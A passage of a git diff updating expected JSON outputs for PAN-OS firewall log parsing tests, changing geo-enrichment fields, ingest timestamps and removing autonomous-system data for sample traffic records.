+13642,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079577900Z", + "ingested": "2021-12-14T14:49:56.151616113Z", "original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:47.000-04:00", "timezone": "America/New_York", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json index 50d42fec91c..46411eb7dad 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json @@ -5,26 +5,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -120,7 +115,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381640800Z", + "ingested": "2021-12-14T14:50:18.748391287Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -145,26 +140,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -260,7 +250,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381649400Z", + "ingested": "2021-12-14T14:50:18.748393940Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -285,26 +275,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -400,7 +385,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381653100Z", + "ingested": "2021-12-14T14:50:18.748394423Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -425,26 +410,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -540,7 +520,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381657700Z", + "ingested": "2021-12-14T14:50:18.748394768Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -565,26 +545,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -680,7 +655,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381663400Z", + "ingested": "2021-12-14T14:50:18.748395133Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -705,26 +680,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -820,7 +790,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381668800Z", + "ingested": "2021-12-14T14:50:18.748395558Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -845,26 +815,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -960,7 +925,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381674200Z", + "ingested": "2021-12-14T14:50:18.748395918Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -985,26 +950,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1100,7 +1060,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381679500Z", + "ingested": "2021-12-14T14:50:18.748396262Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -1125,26 +1085,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1240,7 +1195,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381684800Z", + "ingested": "2021-12-14T14:50:18.748396602Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -1265,26 +1220,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1380,7 +1330,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381690100Z", + "ingested": "2021-12-14T14:50:18.748397050Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -1405,26 +1355,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1520,7 +1465,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381695400Z", + "ingested": "2021-12-14T14:50:18.748397555Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -1545,26 +1490,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1660,7 +1600,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381701200Z", + "ingested": "2021-12-14T14:50:18.748398163Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -1685,26 +1625,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1800,7 +1735,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381706400Z", + "ingested": "2021-12-14T14:50:18.748398520Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -1825,26 +1760,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1940,7 +1870,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381711800Z", + "ingested": "2021-12-14T14:50:18.748398916Z", "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", @@ -1965,26 +1895,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2080,7 +2005,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381717100Z", + "ingested": "2021-12-14T14:50:18.748399275Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2105,26 +2030,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2220,7 +2140,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381722300Z", + "ingested": "2021-12-14T14:50:18.748399609Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2245,26 +2165,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 551, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2360,7 +2275,7 @@ }, "event": { "duration": 512000000000, - "ingested": "2021-12-09T13:43:22.381727900Z", + "ingested": "2021-12-14T14:50:18.748400096Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2385,26 +2300,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2500,7 +2410,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381733300Z", + "ingested": "2021-12-14T14:50:18.748400459Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2525,26 +2435,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2640,7 +2545,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381738800Z", + "ingested": "2021-12-14T14:50:18.748400807Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2665,26 +2570,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2780,7 +2680,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381744Z", + "ingested": "2021-12-14T14:50:18.748401151Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2805,26 +2705,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2920,7 +2815,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381749300Z", + "ingested": "2021-12-14T14:50:18.748401490Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -2945,26 +2840,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3060,7 +2950,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381754600Z", + "ingested": "2021-12-14T14:50:18.748401832Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3085,26 +2975,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 98, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3200,7 +3085,7 @@ }, "event": { "duration": 0, - "ingested": 